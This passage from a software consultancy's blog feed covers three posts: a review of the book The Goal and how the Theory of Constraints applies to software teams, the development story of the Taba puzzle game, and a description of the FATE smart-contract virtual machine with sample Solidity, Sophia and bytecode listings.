&lt;p&gt;The Goal: A Process of Ongoing Improvement&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/chess.jpg&quot; alt=&quot;A chess board.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A chess board.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;I am constantly reading and trying to learn new things. Since I started counting, in 2014, I have read over 400 books. One of the best ones I read recently, even though it is almost as old as I am, is The Goal.&lt;/p&gt;
&lt;p&gt;In The Goal, the authors introduce the Theory of Constraints as a management philosophy, in the form of a novel. This makes it much more engaging and easier to understand than traditional business or management books. The story of Alex Rogo and his struggling plant helps me to relate to the concepts on a personal level. I especially enjoyed the 30th-anniversary audiobook edition with several voice actors.&lt;/p&gt;
&lt;p&gt;The book introduces the Theory of Constraints (TOC), an at the time revolutionary management philosophy, that focuses on improving overall system performance by identifying and managing the system&#39;s constraints. This concept has been widely adopted in various fields, including manufacturing, project management, and software development.&lt;/p&gt;
&lt;p&gt;The book is written as a story about a man named Alex Rogo.
Imagine you&#39;re playing a game, but you&#39;re not sure what the goal is. You&#39;d be confused, right? That&#39;s how Alex Rogo, the main character in &amp;quot;The Goal&amp;quot;, felt about his job. He was running a big factory, but things weren&#39;t going well. The factory was losing money, and if Alex couldn&#39;t fix it, everyone would lose their jobs.&lt;/p&gt;
&lt;p&gt;One day, Alex ran into his old physics teacher, Jonah. Jonah had a different way of looking at things. He told Alex that every big system, like a factory, has one part that slows everything else down. This slow part is called a &amp;quot;constraint&amp;quot;. Jonah said that instead of trying to make every part of the factory work faster, Alex should focus on making the constraint work better.&lt;/p&gt;
&lt;p&gt;Alex thought about what Jonah said and realized that one machine in his factory was slower than the others and was holding everything up. So, he and his team changed the way they worked to make sure this machine was always busy. And guess what? It worked! The factory started making money again, and everyone&#39;s jobs were saved.&lt;/p&gt;
&lt;p&gt;The book also uses the Socratic Method; rather than directly telling Alex the solutions, Jonah asks probing questions that lead Alex to discover the answers on his own. This method not only provides solutions to problems but also fosters learning, critical thinking, and problem-solving skills.&lt;/p&gt;
&lt;p&gt;While the book is set in a manufacturing context, the principles it introduces are relevant to any system or process. This has made the book popular not just among manufacturing professionals, but also among professionals in fields like software development, IT operations, project management, and more.&lt;/p&gt;
&lt;p&gt;Despite being published in the 1980s, the principles introduced in &amp;quot;The Goal&amp;quot; remain relevant today. In a world where efficiency and throughput are key to competitive advantage, the focus on managing constraints to improve overall system performance is more relevant than ever.&lt;/p&gt;
&lt;p&gt;The book also presents a problem-solving methodology called “The five focusing steps”, also known as the process of ongoing improvement. The five steps are designed to identify and manage bottlenecks in order to improve process throughput. Here are the steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Identify the system&#39;s constraint(s)&lt;/strong&gt;: Determine the part of the system that is slowing down the entire process. This could be a machine in a factory, a step in a process, or any other factor that limits the system&#39;s output.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Decide how to exploit the system&#39;s constraint(s)&lt;/strong&gt;: Figure out how to get the most out of the constraint without increasing its capacity. This could involve reducing downtime, improving scheduling, or eliminating inefficiencies.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Subordinate everything else to the above decision(s)&lt;/strong&gt;: Align the entire system to support the constraint. This could involve adjusting schedules, processes, or policies to ensure that the constraint is always working at full capacity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Elevate the system&#39;s constraint(s)&lt;/strong&gt;: If the constraint still limits the system&#39;s output after the above steps, consider ways to increase its capacity. This could involve investing in new equipment, hiring more staff, or other actions that increase the constraint&#39;s throughput.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;If a constraint has been broken, go back to step 1&lt;/strong&gt;. Don&#39;t let inertia become the system&#39;s constraint: Once a constraint is resolved, another part of the system will become the new constraint. The process then repeats, leading to continuous improvement.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These steps provide a systematic approach to improving a system&#39;s output by focusing on its constraints. They can be applied to any system or process, from a manufacturing plant to a software development process.&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/hh_on_water.jpg&quot; alt=&quot;The HappiHacking team Kayaking.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;The HappiHacking team Kayaking.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;&amp;quot;The Goal&amp;quot; and the Theory of Constraints (TOC) provide valuable insights that can be applied to software development. Here are some key takeaways and their applications:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Identify the Constraint&lt;/strong&gt;: In software development, a constraint could be a particular piece of code, a development process, or even a team member. It&#39;s important to identify what is slowing down the development process. This could be done through retrospectives, performance metrics, or simply by asking team members about their challenges. In my experience, the process is often a constraint. Forcing developers to spend time estimating the time it takes to do a task, and having arbitrary sprint cycles that just break up the flow and the productivity of a team is most often a real waste of time.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Another common constraint can be the build, test, and release process. Make sure this is streamlined.&lt;/p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Exploit the Constraint&lt;/strong&gt;: Once the constraint is identified, find ways to make the most of it. This could involve optimizing a piece of code, improving a development process, or providing additional support to a team member. If for example the corporate rules force the team to work in sprints and do estimates, make sure that as little time as possible is spent on this,&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Subordinate and Synchronize&lt;/strong&gt;: Adjust the rest of the system to support the constraint. This could involve changing the order in which tasks are done, reallocating resources, or adjusting schedules to ensure that the constraint is not being held up by other parts of the system.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Elevate the Constraint&lt;/strong&gt;: If the constraint is still a bottleneck, consider ways to increase its capacity. This could involve investing in better tools, providing additional training, or changing the process.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Repeat the Process&lt;/strong&gt;: Once a constraint is resolved, another will appear. Continuous improvement involves repeating this process to identify and address new constraints. Even though I am not a big fan of all the rituals of Scrum, I think it is a good idea to have something like a retrospective every now and then to keep improving.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In addition to these steps, &amp;quot;The Goal&amp;quot; also emphasizes the importance of viewing the system as a whole. In software development, this means looking beyond individual tasks or team members and considering how everything works together. This holistic view can help to identify systemic issues and opportunities for improvement.&lt;/p&gt;
&lt;p&gt;Finally, &amp;quot;The Goal&amp;quot; promotes a culture of learning and adaptation. In software development, the ability to learn from mistakes and adapt to new technologies and methodologies is crucial.&lt;/p&gt;
&lt;p&gt;The most important lesson in the ebook is that The Goal of any business is to make money. It is easy to lose focus on this and instead focus on improving processes and output, but if the output doesn’t improve the bottom line, then the whole exercise is pointless. Always make sure you are working on the most important thing to increase revenue or profit, then try to do this as efficiently as possible.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Taba the story</title>
    <link href="https://happihacking.com/blog/posts/2023/taba_story/"/>
    <updated>2023-06-01T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/taba_story/</id>
    <content type="html">&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/taba_0_0_1.jpg&quot; alt=&quot;The Taba game on a chess board.&quot; title=&quot;The Taba game on a chess board.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;In 2017, we embarked on a journey to build a blockchain named Aeternity. We used Erlang and developed a virtual machine called Fate, along with a programming language named Sophia.&lt;/p&gt;
&lt;p&gt;You can read more about Fate in another &lt;a href=&quot;https://happihacking.com/blog/posts/2023/fate/&quot;&gt;post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As a fun application to test on the chain, we built a game contract.&lt;/p&gt;
&lt;p&gt;The idea was that the game begins when a player calls the start function in the contract. Other players have until height H+1000 to place a bet. At height H+1001, players can call the contract to get a seed from the H+1000 block hash. Players can then view the game in their app, solve it, and push the number of moves and a hash of the solution to the contract. At height H+2000, a player can claim the winnings by sending in their solution. The player who first produced the shortest correct solutions wins and gets the tokens.&lt;/p&gt;
&lt;p&gt;But since this was a bit too close to gambling we decided to never
publish the contract or the game.&lt;/p&gt;
&lt;p&gt;Instead we rewrote the game in Erlang and JavaScript.
We used some fantastic creative commons graphics to enhance the game&#39;s visual appeal in this version.&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/old_sliding.png&quot; alt=&quot;The Taba game with not so nice graphiscs.&quot; title=&quot;The Taba game with not so nice graphiscs.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;For the Erlang server we used the Cowboy webserver with a worker pool.Each worker handles one request. For single-player mode, we used a REST API and serialized through the database. For multiplayer mode, we used a WebSocket API and serialized in a gen_server (1/game) with state backed to the database.&lt;/p&gt;
&lt;p&gt;Then we developed a solver in C to find solutions for the puzzles. The solver is capable of finding the optimal solution. We use this
to calculate the difficulty of the puzzle.&lt;/p&gt;
&lt;p&gt;Our designer, Johannes, created more appealing graphics for the game, and we rewrote the frontend in Dart and Flutter. Puzzles are generated using a pseudo-random number generator implemented in all involved languages (Erlang, JavaScript, Dart, Java).&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/sliding_v2.png&quot; alt=&quot;The Taba game with better graphiscs.&quot; title=&quot;The Taba game with better graphiscs.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;The game is very easy to pick up and play. It is available for download for free on the App Store and Google Play. The current version of the game boasts over 19 quintillions of puzzles to solve, with new features being added regularly.&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/taba_1_0.png&quot; alt=&quot;The Taba game with nice graphiscs.&quot; title=&quot;The Taba game with nice graphiscs.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;The game is hosted at &lt;a href=&quot;https://www.taba.quest/&quot;&gt;Taba Quest&lt;/a&gt; where you can read more about it.&lt;/p&gt;
&lt;p&gt;Or you can just &lt;a href=&quot;https://www.taba.quest/go_to_store/&quot;&gt;download it&lt;/a&gt;,
but don&#39;t blame me if all your free time suddenly is gone.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>FATE: Revolutionizing Smart Contract Execution</title>
    <link href="https://happihacking.com/blog/posts/2023/fate/"/>
    <updated>2023-05-31T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/fate/</id>
    <summary>Enhancing Efficiency and Safety in Blockchain Applications</summary>
    <content type="html">&lt;h2 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Smart contracts serve as the building blocks for decentralized applications. At HappiHacking, we had
the privilege of collaborating with æternity, a blockchain platform built on the BEAM in
Erlang. Together, we embarked on a mission to develop a virtual machine that would revolutionize
smart contract execution. This blog post takes you through our journey and highlights the key
features of FATE (Fast æternity Transaction Engine), an innovative solution that enhances efficiency
and safety in blockchain applications.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/city_dragon.png&quot; alt=&quot;A city in the night.&quot; title=&quot;A city in the night.&quot; /&gt;
&lt;h2 id=&quot;the-genesis-of-fate&quot; tabindex=&quot;-1&quot;&gt;The Genesis of FATE&lt;/h2&gt;
&lt;p&gt;HH (HappiHacking) was approached by æternity who were building a blockchain on the BEAM in Erlang.
They wanted to have a virtual machine to execute smart contracts on their new blockchain.&lt;/p&gt;
&lt;p&gt;We were invited to a meetup with the development team in Sophia, Bulgaria two weeks later.  Neither
I nor Tobias new anything about blockchains at the time.  So I sat down with the Ethereum &amp;quot;yellow
paper&amp;quot; (sic!) to learn something about the technology.  In order to really understand the Ethereum
virtual machine, the EVM, I implemented a version of it in Erlang. I called this VM &amp;quot;AEVM&amp;quot; for the
æternity Ethereum Virtual Machine.&lt;/p&gt;
&lt;p&gt;Me and Tobias were very excited to go to Sophia and learn everything about blockchain from the
development team. After a few intensive days of discussions we realized that the blockchain
technology was in its infancy and very new, no one new that much about the technology, how to
implement it or even which features to implement.&lt;/p&gt;
&lt;p&gt;When I showed the team my AEVM implementation, everyone was impressed and we got a very central
position in the æternity core team.&lt;/p&gt;
&lt;h3 id=&quot;taking-the-lead-in-technical-decisions&quot; tabindex=&quot;-1&quot;&gt;Taking the Lead in Technical Decisions&lt;/h3&gt;
&lt;p&gt;For the next two years me and Tobias lead many of the technical decisions and coded much of the core
of æternity. When the main features of the blockchain were implemented we started thinking about how
to really design a virtual machine for the blockchain.&lt;/p&gt;
&lt;h3 id=&quot;identifying-the-vision-for-smart-contracts&quot; tabindex=&quot;-1&quot;&gt;Identifying the Vision for Smart Contracts&lt;/h3&gt;
&lt;p&gt;We identified a number of properties we saw or wanted to see in Smart Contracts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Short run time&lt;/li&gt;
&lt;li&gt;Deterministic&lt;/li&gt;
&lt;li&gt;Reusable&lt;/li&gt;
&lt;li&gt;Easy to understand and verify&lt;/li&gt;
&lt;li&gt;Easy access to æternity specific features (Oracles, Contracts, Channels)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;challenges-with-existing-solutions&quot; tabindex=&quot;-1&quot;&gt;Challenges with Existing Solutions&lt;/h3&gt;
&lt;p&gt;We also saw a number of problems with the design of Solidity, the Ethereum smart contract language,
and the design EVM which also affected the AEVM.  The EVM was modeled after a computer. It had stack
slots, and memory addresses, word length, and arithmetic that could overflow or silently fail.&lt;/p&gt;
&lt;h3 id=&quot;the-solution-sophia-and-fate&quot; tabindex=&quot;-1&quot;&gt;The Solution -- Sophia and FATE&lt;/h3&gt;
&lt;p&gt;To address these challenges and create a superior smart contract execution environment, we developed
the Sophia programming language. Sophia embodies the following principles:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Static Typing: Sophia is statically typed, ensuring type safety and reducing common programming
errors.&lt;/li&gt;
&lt;li&gt;Concurrency Control: While allowing parallelism, Sophia avoids true concurrency, simplifying
execution and enhancing safety.&lt;/li&gt;
&lt;li&gt;Well-Defined Errors: Sophia incorporates comprehensive error handling mechanisms, providing clear
and unambiguous error messages to developers.&lt;/li&gt;
&lt;li&gt;Safety Focus: With Sophia, safety is prioritized through design choices that prevent
vulnerabilities and protect against attacks.&lt;/li&gt;
&lt;li&gt;Blockchain Integration: Sophia is closely integrated with the æternity blockchain, offering
seamless access to its unique features.&lt;/li&gt;
&lt;li&gt;Data Structure Efficiency: Sophia emphasizes well-defined serialization and storage mechanisms,
eliminating unnecessary complexities.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We also designed a type-safe high-level virtual machine for smart contracts.  FATE is highly
optimized for Sophia and the æternity blockchain.  FATE is the culmination of our efforts, embodying
the principles outlined above.&lt;/p&gt;
&lt;h4&gt;No Memory Limit&lt;/h4&gt;
&lt;p&gt;Fate removes the traditional memory limit found in other virtual machines. Instead, it introduces
gas control to manage the execution of smart contracts. Gas acts as a resource limit and ensures
that computations within smart contracts do not exceed the available resources. By removing the
memory limit, Fate offers more flexibility in executing complex computations without being
restricted by memory constraints.&lt;/p&gt;
&lt;h4&gt;Gas Controlled&lt;/h4&gt;
&lt;p&gt;Gas control is a fundamental aspect of the Fate virtual machine. Each operation and computation
within a smart contract consumes a specific amount of gas. The gas consumption determines the cost
of executing the contract. Gas control ensures that smart contracts are executed within the
specified resource limits and prevents malicious or computationally expensive code from monopolizing
the system. By incorporating gas control, Fate promotes fair resource allocation and efficient
contract execution.&lt;/p&gt;
&lt;h4&gt;No Concurrency (Parallelism Possible)&lt;/h4&gt;
&lt;p&gt;Fate operates without native support for concurrency. While individual contracts run sequentially,
the absence of concurrency within a single contract enhances determinism and simplifies contract
development, testing, and debugging. External parallelism could be achieved by executing multiple
contracts or transactions concurrently, leveraging the inherent scalability of the underlying
blockchain network.&lt;/p&gt;
&lt;h4&gt;Statically Typed (No Floats)&lt;/h4&gt;
&lt;p&gt;Fate employs static typing, which provides enhanced safety and predictability in smart contract
development. Static typing requires variables and data types to be explicitly declared and verified
at compile-time. This approach eliminates common type-related errors and improves code
correctness. Additionally, Fate avoids the use of floating-point numbers, which can introduce
complexities and potential precision issues. By adhering to a statically typed model and excluding
floats, Fate enhances contract reliability and predictability.&lt;/p&gt;
&lt;h4&gt;Well Defined Errors&lt;/h4&gt;
&lt;p&gt;Fate ensures well-defined errors during contract execution. This feature helps developers identify
and handle exceptions, errors, and invalid operations within their contracts. Clear error messages
and exception handling mechanisms enable efficient debugging and troubleshooting, facilitating the
development process and enhancing contract robustness.&lt;/p&gt;
&lt;h4&gt;Close Integration to Blockchain&lt;/h4&gt;
&lt;p&gt;Fate is designed for close integration with the blockchain it operates on, such as the æternity
blockchain. This integration allows seamless interaction between smart contracts and the underlying
blockchain infrastructure. Fate leverages æternity-specific features, such as oracles, contracts,
and channels, to enable efficient and secure communication, data exchange, and execution of
blockchain-based applications.&lt;/p&gt;
&lt;h4&gt;Stack-Based&lt;/h4&gt;
&lt;p&gt;Fate follows a stack-based execution model, where operations are performed on a stack of data
elements. This model simplifies the execution process and enables efficient memory management. The
stack-based approach allows for compact bytecode representation and optimized execution, making Fate
well-suited for resource-constrained environments like blockchain networks.&lt;/p&gt;
&lt;h4&gt;Well Defined Serialization&lt;/h4&gt;
&lt;p&gt;Serialization refers to the process of converting data structures or objects into a format suitable
for storage or transmission. Fate ensures well-defined serialization mechanisms, which enable
efficient and reliable serialization of data within smart contracts. This feature is crucial for a
blockchain which depends on determinism.&lt;/p&gt;
&lt;p&gt;By incorporating these features, Fate provides a powerful and efficient execution environment for
smart contracts. Its gas control, stack-based execution, well-defined errors, and close integration
with the blockchain contribute to the secure and reliable execution of contracts on the æternity
blockchain. Developers can leverage Fate&#39;s features to build sophisticated, deterministic, and
high-performing applications on the blockchain.&lt;/p&gt;
&lt;p&gt;Fate has the following built in types, in the virtual machine language.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-haskell&quot;&gt;-- Fate types
Integer -- signed arbitrary precision integers
Boolean -- (true | false)
Address -- A pointer into the state tree
Contract | Oracle | Oracle_query | Channel
String -- utf8 encoded byte arrays
Bytes
Tuple (), (&#39;a), (&#39;a, &#39;b, ...)
List -- Cons cells (‘a) | Nil (Ʇ)
Map (‘a, ‘b) -- (Key: ‘a -&amp;gt; Value: ‘b) ‘a not a map
Variant (| [Sizes] | Tag | Elements |)
Bits
TypeRep
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In a blockchain virtual machine, such as FATE, the design choices regarding code structure, code
addresses, and data size play a crucial role in ensuring the integrity, security, and efficiency of
smart contract execution within the blockchain ecosystem. We decided to have no memory addresses in
FATE to make it impossible to trick the VM to execute the wrong code. Instead we have the following
design:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Basic Blocks (BB): The code structure is organized into Basic Blocks. A Basic Block is a sequence
of instructions that can be executed without interruption. By dividing the code into Basic
Blocks, the VM can optimize the execution process, handle control flow efficiently, and provide
better security and auditing capabilities.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Absence of code/instruction addresses: In FATE, there are no specific addresses assigned to code
instructions. This is primarily done to enhance security and prevent arbitrary code jumps or
modifications. By removing direct access to code memory addresses, the VM ensures that the
execution of smart contracts follows a predefined and controlled path, reducing the risk of
malicious or unauthorized code manipulation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Function-centric code organization: Each function within a smart contract has its own code. This
separation allows for modularity and encapsulation of functionality. It enables efficient code
reuse, improves readability, and simplifies the debugging and maintenance processes. Moreover, by
isolating functions, the VM can manage resources and handle function calls in a structured and
controlled manner.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Unspecified data size: FATE does not impose a predetermined size for data. This flexibility is
essential to accommodate varying data requirements of different smart contracts. It allows for
the storage and manipulation of data structures of different sizes, ranging from small integers
to large arrays or complex objects. By not limiting the data size, the VM promotes versatility
and adaptability in smart contract development. It also removes all possible overflow bugs and
attacks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;No defined word size: Unlike traditional computer architectures, FATE does not enforce a fixed
word size for instructions or data. This design choice grants flexibility to the VM
implementation, allowing it to optimize memory usage and adapt to the specific requirements of
the blockchain platform. It enables efficient storage and processing of data without unnecessary
overhead or constraints imposed by fixed word sizes. This also removes all possible overflow bugs
and attacks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Flexible data storage: The implementation of FATE has the freedom to choose how data is
stored. This flexibility ensures that the VM can utilize the most suitable data structures and
storage mechanisms for the given platform. It enables efficient data retrieval, manipulation, and
persistence while considering factors such as storage cost, access speed, and compatibility with
the underlying infrastructure.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Absence of word size or byte size addresses to memory: In FATE, memory addresses are not defined
based on word size or byte size. This design decision allows for a more abstract and agnostic
representation of memory, decoupling it from specific hardware architectures. It enables the VM
to handle memory operations in a platform-independent manner, promoting compatibility and
portability.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Overall, these design choices aim to strike a balance between security, efficiency, flexibility, and
compatibility. By carefully considering the unique requirements and constraints of blockchain
systems, the VM can provide a reliable and robust execution environment for smart contracts,
fostering trust, transparency, and decentralized application development.&lt;/p&gt;
&lt;p&gt;Let us look at some code examples. Here is a simple Solidity (the default language of Ethereum and
EVM) contract with just an identity function.&lt;/p&gt;
&lt;p&gt;Solidity&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sol&quot;&gt;// Solidity
pragma solidity ^0.5.11;
contract Identity {
    function id(int256 X) public pure returns (int256) {
        return X;
    }
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the same contract in Sophia.&lt;/p&gt;
&lt;p&gt;Sophia&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sol&quot;&gt;// Sophia
contract Identity = payable entrypoint main (x:int) = x
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note how much shorter just such a simple contract is and also that in Solidity you have to specify
the word size of your integer.&lt;/p&gt;
&lt;p&gt;If we compile the Solidity Identity to the Ethereum Virtual Machine (EVM) assembly language we get a
quite large program:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-wasm&quot;&gt; PUSH1 0x80 PUSH1 0x40 MSTORE CALLVALUE DUP1 ISZERO
 PUSH1 0xF JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP
 PUSH1 0xAB DUP1 PUSH2 0x1E PUSH1 0x0 CODECOPY PUSH1 0x0
 RETURN INVALID PUSH1 0x80 PUSH1 0x40 MSTORE CALLVALUE
 DUP1 ISZERO PUSH1 0xF JUMPI PUSH1 0x0 DUP1 REVERT
 JUMPDEST POP PUSH1 0x4 CALLDATASIZE LT PUSH1 0x28
 JUMPI PUSH1 0x0 CALLDATALOAD PUSH1 0xE0 SHR DUP1
 PUSH4 0x1A94D83E EQ PUSH1 0x2D JUMPI JUMPDEST
 PUSH1 0x0 DUP1 REVERT JUMPDEST PUSH1 0x56 PUSH1 0x4
 DUP1 CALLDATASIZE SUB PUSH1 0x20 DUP2 LT ISZERO
 PUSH1 0x41 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2
 ADD SWAP1 DUP1 DUP1 CALLDATALOAD SWAP1 PUSH1 0x20 ADD
 SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH1 0x6C JUMP
 JUMPDEST PUSH1 0x40 MLOAD DUP1 DUP3 DUP2 MSTORE
 PUSH1 0x20 ADD SWAP2 POP POP PUSH1 0x40 MLOAD DUP1
 SWAP2 SUB SWAP1 RETURN JUMPDEST PUSH1 0x0 DUP2 SWAP1
 POP SWAP2 SWAP1 POP JUMP INVALID LOG2 PUSH6
 0x627A7A723158 KECCAK256 0xc2 0xb9 0xdf 0xb0 0xc8
 0xdf 0xf6 SWAP14 SWAP14 0xe9 0x46 0xcd PUSH17
 0x1D21108C0786A26266D0F114ADBF024CDE 0x4b 0xd1
 PUSH5 0x736F6C6343 STOP SDIV SIGNEXTEND STOP ORIGIN
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we compile the Sophia Identity contract to AEVM we get a slightly smaller bytecode:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-wasm&quot;&gt;PUSH3 0, 0, 100 PUSH3 0, 0, 132 SWAP2 DUP1 DUP1 DUP1
MLOAD PUSH32 185, 201, 86, 242, 139, 49, 73, 169, 245,
152, 122, 165, 5, 243, 218, 27, 34, 9, 204, 87, 57, 35,
64, 6, 43, 182, 193, 189, 159, 159, 153, 234 EQ PUSH3 0,
0, 192 JUMPI POP DUP1 MLOAD PUSH32 104, 242, 103, 99,
56, 255, 80, 136, 57, 171, 164, 119, 73, 239, 250, 139,
232, 126, 242, 132, 242, 7, 251, 61, 153, 152, 112, 28,
213, 56, 135, 197 EQ PUSH3 0, 0, 175 JUMPI POP PUSH1 1
NOT MLOAD STOP JUMPDEST PUSH1 0 NOT MSIZE PUSH1 32 ADD
SWAP1 DUP2 MSTORE PUSH1 32 SWAP1 SUB PUSH1 3 DUP2 MSTORE
SWAP1 MSIZE PUSH1 0 MLOAD MSIZE MSTORE PUSH1 0 MSTORE
PUSH1 0 RETURN JUMPDEST PUSH1 0 DUP1 MSTORE PUSH1 0
RETURN JUMPDEST MSIZE MSIZE PUSH1 32 ADD SWAP1 DUP2
MSTORE PUSH1 32 SWAP1 SUB PUSH1 0 NOT MSIZE PUSH1 32 ADD
SWAP1 DUP2 MSTORE PUSH1 32 SWAP1 SUB PUSH1 3 DUP2 MSTORE
DUP2 MSTORE SWAP1 JUMP JUMPDEST PUSH1 32 ADD MLOAD MLOAD
MSIZE POP DUP1 SWAP2 POP POP DUP1 SWAP1 POP SWAP1 JUMP
JUMPDEST POP POP DUP3 SWAP2 POP POP PUSH3 0, 0, 140 JUMP
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When we compile the Sophia Identity contract to FATE we get:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-wasm&quot;&gt;FUNCTION init() : {tuple,[]}
    ;; BB : 0
    STORE store1 ()
    RETURNR ()

FUNCTION main(integer) : integer
    ;; BB : 0
    RETURNR arg0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That&#39;s it. That is the actual FATE assembler code. Short, readable and to the point.&lt;/p&gt;
&lt;p&gt;In conclusion, the FATE (Fast æternity Transaction Engine) virtual machine offers several advantages
in terms of safety, efficiency, and cost-effectiveness compared to other blockchain virtual machines
like AEVM (æternity Ethereum Virtual Machine).&lt;/p&gt;
&lt;p&gt;Overall, FATE serves as an efficient and secure transaction engine for executing smart
contracts. Its type safety, deterministic nature, gas-limited memory, and execution provide a
reliable and predictable environment for building decentralized applications. With its compact
bytecode and improved performance, FATE offers an enhanced user experience and cost-effective
utilization of blockchain resources.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;In the æternity project we used many of the services that HappiHacking is known for:&lt;/p&gt;
&lt;dl&gt;
&lt;dt&gt;Rapid Prototyping&lt;/dt&gt;
&lt;dd&gt;We developed the AEVM in two weeks, proving that it would be feasible to write a virtual machine
for æternity.&lt;/dd&gt;
&lt;dt&gt;The Happy Path Method&lt;/dt&gt;
&lt;dd&gt;Through the project we developed the most important aspects first and quickly without sacrificing
quality and performance. Steering the project forward with a gentle hand even when we didn&#39;t have
formal leadership roles.&lt;/dd&gt;
&lt;dt&gt;Rubberducking as a Service&lt;/dt&gt;
&lt;dd&gt;We were there for the rest of the development team and management to discuss ideas and solutions.&lt;/dd&gt;
&lt;dt&gt;Erlang &amp;amp; Beam Expertise&lt;/dt&gt;
&lt;dd&gt;With our long experience in developing production quality Erlang systems we managed to get a
performant, reliant, robust and scalable blockchain system built in time.&lt;/dd&gt;
&lt;/dl&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/erlang_beer.jpg&quot; alt=&quot;A beer
  glass with an Erlang logo.&quot; title=&quot;A beer
  glass with an Erlang logo.&quot; /&gt; &lt;/div&gt;
&lt;dl&gt;
&lt;dt&gt;Full-Service Project Partner&lt;/dt&gt;
&lt;dd&gt;We took an ide that was mostly in the head of the founder of æternity and turned it into a design,
architecture, a working system, and a live deployment.&lt;/dd&gt;
&lt;dt&gt;Deep-dive analysis and problem solving&lt;/dt&gt;
&lt;dd&gt;We took our time to really understand the domain, and then we designed Sophia and FATE.  We also
worked on many other problems in the blockchain world such as Merkle Patricia Tries, oracles, state
channels, names, accounts, Bitcoin.NG, proof of work and more.&lt;/dd&gt;
&lt;dt&gt;System Validation through Tech Lead Mentoring&lt;/dt&gt;
&lt;dd&gt;Me and Tobias embedded ourselves in the development team and could mentor more junior developers,
review code and make sure the system architecture was solid.&lt;/dd&gt;
&lt;dt&gt;Team management&lt;/dt&gt;
&lt;dd&gt;Happi often lead daily stand ups and discussion when the team met.&lt;/dd&gt;
